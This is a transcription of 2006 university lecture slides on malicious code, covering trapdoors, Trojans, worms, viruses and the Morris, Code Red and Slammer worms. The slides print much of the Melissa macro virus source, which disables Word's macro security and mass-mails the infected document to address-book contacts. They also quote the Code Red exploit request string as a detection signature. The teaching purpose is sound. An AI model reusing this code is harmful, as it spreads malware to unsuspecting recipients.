CSE331: Introduction to Networks and Security. Lecture 14 Fall 2006

Similar documents
CSE331: Introduction to Networks and Security. Lecture 15 Fall 2006

Sapphire/Slammer Worm. Code Red v2. Sapphire/Slammer Worm. Sapphire/Slammer Worm. Sapphire/Slammer Worm. Why Was Slammer So Fast?

Cryptography and Network Security Chapter 21. Malicious Software. Backdoor or Trapdoor. Logic Bomb 4/19/2010. Chapter 21 Malicious Software

CS549: Cryptography and Network Security

Malicious Software. Ola Flygt Växjö University, Sweden Viruses and Related Threats

Malicious Software. Malicious Software. Overview. Backdoor or Trapdoor. Raj Jain. Washington University in St. Louis

Malware: Malicious Code

HoneyBOT User Guide A Windows based honeypot solution

Computer Security DD2395

Lecture 13 - Network Security

CSE331: Introduction to Networks and Security. Lecture 17 Fall 2006

ANTIVIRUS BEST PRACTICES

Lectures 9 Advanced Operating Systems Fundamental Security. Computer Systems Administration TE2003

How To Attack A Server With A Ddos Attack On A Zombie Army Of Your Computer (For A Free Download)

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 2 Systems Threats and Risks

CSE331: Introduction to Networks and Security. Lecture 18 Fall 2006

CMSC 421, Operating Systems. Fall Security. URL: Dr. Kalpakis

NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT

Malicious Programs. CEN 448 Security and Internet Protocols Chapter 19 Malicious Software

WORMS : attacks, defense and models. Presented by: Abhishek Sharma Vijay Erramilli

SECURITY TERMS: Advisory Backdoor - Blended Threat Blind Worm Bootstrapped Worm Bot Coordinated Scanning

Intelligent Worms: Searching for Preys

CS 640 Introduction to Computer Networks. Network security (continued) Key Distribution a first step. Lecture24

ITSC Training Courses Student IT Competence Programme SIIS1 Information Security

10- Assume you open your credit card bill and see several large unauthorized charges unfortunately you may have been the victim of (identity theft)

Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

ICTN Enterprise Database Security Issues and Solutions

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

E-commerce. Security. Learning objectives. Internet Security Issues: Overview. Managing Risk-1. Managing Risk-2. Computer Security Classifications

CRYPTUS DIPLOMA IN IT SECURITY

ANTI-VIRUS POLICY OCIO TABLE OF CONTENTS

FREQUENTLY ASKED QUESTIONS

Hacking Techniques in Wired Networks

Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them

Spam, Spyware, Malware and You! Don't give up just yet! Presented by: Mervin Istace Provincial Library Saskatchewan Learning

CS 356 Lecture 9 Malicious Code. Spring 2013

Security Correlation Server Quick Installation Guide

Hack Your SQL Server Database Before the Hackers Do

Network Incident Report

Threat Modeling. Frank Piessens ) KATHOLIEKE UNIVERSITEIT LEUVEN

Chapter 14 Computer Threats

Contents Introduction xxvi Chapter 1: Understanding the Threats: Viruses, Trojans, Mail Bombers, Worms, and Illicit Servers

Information Security Threat Trends

Bendigo and Adelaide Bank Ltd Security Incident Response Procedure

Penetration Testing Report Client: Business Solutions June 15 th 2015

E-BUSINESS THREATS AND SOLUTIONS

6WRUP:DWFK. Policies for Dedicated SQL Servers Group

Seminar Computer Security

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

CSE331: Introduction to Networks and Security. Lecture 32 Fall 2004

1 Introduction. Agenda Item: Work Item:

ACS-3921/ Computer Security And Privacy. Lecture Note 5 October 7 th 2015 Chapter 5 Database and Cloud Security

SY system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

Lecture 19 - Network Security

Secure and Safe Computing Primer Examples of Desktop and Laptop standards and guidelines

PC Security and Maintenance

Firewalls and Software Updates

Site Monitor. Version 5.3

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web App Security Audit Services

How To Set Up An Ip Firewall On Linux With Iptables (For Ubuntu) And Iptable (For Windows)

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Adjusting Prevention Policy Options Based on Prevention Events. Version 1.0 July 2006

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Computer Viruses: How to Avoid Infection

1 Introduction. Agenda Item: Work Item:

COSC 472 Network Security

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

SECURING INFORMATION SYSTEMS

Loophole+ with Ethical Hacking and Penetration Testing

Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1

The Evolution of Computer Security Attacks and Defenses. Angelos D. Keromytis Columbia University

DDos. Distributed Denial of Service Attacks. by Mark Schuchter

Topic 1 Lesson 1: Importance of network security

CS5008: Internet Computing

Computer Networks & Computer Security

WORMS HALMSTAD UNIVERSITY. Network Security. Network Design and Computer Management. Project Title:

Security Correlation Server Quick Installation Guide

Botnets. Botnets and Spam. Joining the IRC Channel. Command and Control. Tadayoshi Kohno

COB 302 Management Information System (Lesson 8)

Denial of Service (DoS)

Evolutionism of Intrusion Detection

CS574 Computer Security. San Diego State University Spring 2008 Lecture #7

Test Case - Privatefirewall 5.0, Intrusion and Malware Defense

Spyware. Michael Glenn Technology Management 2004 Qwest Communications International Inc.

Payment Card Industry (PCI) Data Security Standard

MCTS Guide to Microsoft Windows 7. Chapter 7 Windows 7 Security Features

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

USM IT Security Council Guide for Security Event Logging. Version 1.1

Transcription:

CSE331: Introduction to Networks and Security Lecture 14 Fall 2006

Announcements Homework 1 has been graded: Class average: 82 Std. Dev.: 13 CSE331 Fall 2004 2

Malicious Code Trapdoors (e.g. debugging modes) Trojan Horses (e.g. Phishing, Web sites with exploits) Worms (e.g. Slammer, Sasser, Code Red) Viruses (e.g. Bagle MyDoom mail virus) The distinction between worms and viruses is somewhat fuzzy CSE331 Fall 2004 3

Effects of Malicious Code Data corruption Denial of service Crash machines Overload network infrastructure Expose confidential / secret information Create "zombie" devices Allows attacker to use other people's machines, often for spam, or distributed denial of service CSE331 Fall 2004 4

Trapdoors A trapdoor is a secret entry point into a module Affects a particular system Inserted during code development Accidentally (forget to remove debugging code) Intentionally (maintenance) Maliciously (an insider creates a hole) CSE331 Fall 2004 5

Trojan Horse A program that pretends to be do one thing when it does another Or does more than advertised Login Prompts Trusted path Accounting software Examples: Game that doubles as a sshd process. Phishing attacks (Spoofed e-mails/web sites) CSE331 Fall 2004 6

Worms (In General) Self-contained running programs Unlike viruses (although this distinction is mostly academic) Infection strategy more active Exploit buffer overflows Exploit bad password choice Defenses: Filtering firewalls Monitor system resources Proper access control CSE331 Fall 2004 7

Viruses A computer virus is a (malicious) program Creates (possibly modified) copies of itself Attaches to a host program or data Often has other effects (deleting files, jokes, messages) Viruses cannot propagate without a host Typically require some user action to activate CSE331 Fall 2004 8

Virus/Worm Writer s Goals Hard to detect Hard to destroy or deactivate Spreads infection widely/quickly Can reinfect a host Easy to create Machine/OS independent CSE331 Fall 2004 9

Kinds of Viruses Boot Sector Viruses Historically important, but less common today Memory Resident Viruses Standard infected executable Macro Viruses (probably most common today) Embedded in documents (like Word docs) Macros are just programs Word processors & Spreadsheets Startup macro Macros turned on by default Visual Basic Script (VBScript) CSE331 Fall 2004 10

Melissa Macro Virus Implementation VBA (Visual Basic for Applications) code associated with the "document.open" method of Word Strategy Email message containing an infected Word document as an attachment Opening Word document triggers virus if macros are enabled Under certain conditions included attached documents created by the victim CSE331 Fall 2004 11

Melissa Macro Virus: Behavior Setup lowers the macro security settings permit all macros to run without warning Checks registry for key value by Kwyjibo HKEY_Current_User\Software\Microsoft\Office\Melissa? Propagation sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro CSE331 Fall 2004 12

Melissa Macro Virus: Behavior Propagation Continued Infects Normal.doc template file Normal.doc is used by all Word documents Joke If minute matches the day of the month, the macro inserts message Twenty-two points, plus tripleword-score, plus fifty points for using all my letters. Game's over. I'm outta here. CSE331 Fall 2004 13

// Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1-1): Options.VirusProtection = (1-1): Options.SaveNormalPrompt = (1-1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If

Worm Research Sources "Inside the Slammer Worm" Moore, Paxson, Savage, Shannon, Staniford, and Weaver "How to 0wn the Internet in Your Spare Time" Staniford, Paxson, and Weaver "The Top Speed of Flash Worms" Staniford, Moore, Paxson, and Weaver "Internet Quarantine: Requirements for Containing Self-Propagating Code" Moore, Shannon, Voelker, and Savage "Automated Worm Fingerprinting" Singh, Estan, Varghese, and Savage Links on the course web pages. CSE331 Fall 2004 16

Morris Internet Worm November 2, 1988 Infected around 6,000 major Unix machines Cost of the damage at $10m - $100m Robert T. Morris Jr. unleashed Internet worm Graduate student at Cornell University Convicted in 1990 of violating Computer Fraud and Abuse Act $10,000 fine, 3 yr. Suspended jail sentence, 400 hours of community service Son of the chief scientist at the National Computer Security Center -- part of the National Security Agency Today he s a professor at MIT CSE331 Fall 2004 17

The Morris Worm Did Not: Alter or destroy files Save or transmit the passwords which it cracked Make special attempts to gain root or superuser access in a system (and didn't utilize the privileges if it managed to get them). Place copies of itself or other programs into memory to be executed at a later time. (Such programs are commonly referred to as timebombs.) Attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent). Attack machines that were not attached to the internet. Travel from machine to machine via disk. Cause physical damage to computer systems. CSE331 Fall 2004 18

Morris Worm Transmission Find user accounts on the target machine Dictionary attack on /etc/passwd If it found a match, it would log in and try the same username/password on other local machines Exploit bug in fingerd Classic buffer overflow attack Exploit trapdoor in sendmail Programmer left DEBUG mode in sendmail, which allowed sendmail to execute an arbitrary shell command string. CSE331 Fall 2004 19

Morris Worm Infection Sent a small loader to target machine 99 lines of C code It was compiled on the remote platform (cross platform compatibility!) The loader program transferred the rest of the worm from the infected host to the new target. Used authentication! To prevent sys admins from tampering with loaded code. If there was a transmission error, the loader would erase its tracks and exit. CSE331 Fall 2004 20

Morris Worm Stealth/DoS When loader obtained full code It put into main memory and encrypted Original copies were deleted from disk (Even memory dump wouldn t expose worm) Worm periodically changed its name and process ID Resource exhaustion Denial of service There was a bug in the loader program that caused many copies of the worm to be spawned per host System administrators cut their network connections Couldn t use internet to exchange fixes! CSE331 Fall 2004 21

Code Red Worm (July 2001) Exploited buffer overflow vulnerability in IIS Indexing Service DLL Attack Sequence: The victim host is scanned for TCP port 80. The attacking host sends the exploit string to the victim. The worm, now executing on the victim host, checks for the existence of c:\notworm. If found, the worm ceases execution. If c:\notworm is not found, the worm begins spawning threads to scan random IP addresses for hosts listening on TCP port 80, exploiting any vulnerable hosts it finds. If the victim host's default language is English, then after 100 scanning threads have started and a certain period of time has elapsed following infection, all web pages served by the victim host are defaced with the message, CSE331 Fall 2004 22

Code Red Analysis http://www.caida.org/analysis/security/code-red/ http://www.caida.org/analysis/security/codered/newframes-small-log.gif In less than 14 hours, 359,104 hosts were compromised. Doubled population in 37 minutes on average Attempted to launch a Denial of Service (DoS) attack against www1.whitehouse.gov, Attacked the IP address of the server, rather than the domain name Checked to make sure that port 80 was active before launching the denial of service phase of the attack. These features made it trivially easy to disable the Denial of Service (phase 2) portion of the attack. We cannot expect such weaknesses in the design of future attacks. CSE331 Fall 2004 23

Code Red Worm The "Code Red" worm can be identified on victim machines by the presence of the following string in IIS log files: /default.ida?nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a Additionally, web pages on victim machines may be defaced with the following message: HELLO! Welcome to http://www.worm.com! Hacked By Chinese! CSE331 Fall 2004 24

Slammer Worm Saturday, 25 Jan. 2003 around 05:30 UTC Exploited buffer overflow in Microsoft's SQL Server or MS SQL Desktop Engine (MSDE). Port 1434 (not a very commonly used port) Infected > 75,000 hosts (likely more) Less than 10 minutes! Reached peak scanning rate (55 million scans/sec) in 3 minutes. No malicious payload Used a single UDP packet with buffer overflow code injection to spread. Bugs in the Slammer code slowed its growth The author made mistakes in the random number generator CSE331 Fall 2004 25

Internet Worm Trends Code Red, Code Red II, Nimda (TCP 80, Win IIS) Code Red infected more than 350,000 on July 19, 2001 by several hours Uniformly scans the entire IPv4 space Code Red II (local scan), Nimda (multiple ways) SQL Slammer (UDP 1434, SQL server) Infected more than 75,000 on Jan 25, 2003 Infected 90% of vulnerable hosts in 10 minutes. Blaster (TCP 135, Win RPC) Sequential scan; infected 300,000 to more than 1 million hosts on August 11, 2003. CSE331 Fall 2004 26

But it gets worse: Flash Worms Paper: "The Top Speed of Flash Worms" Idea: Don't do random search Instead, partition the search space among instances of the worm Permutation scanning Or, keep a tailored "hit list" of vulnerable hosts and distribute this initial set to the first worms spawned Simulations suggest that such a worm could saturate 95% of 1,000,000 vulnerable hosts on the Internet in 510 milliseconds. Using UDP For TCP it would take 1.3 seconds CSE331 Fall 2004 27

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information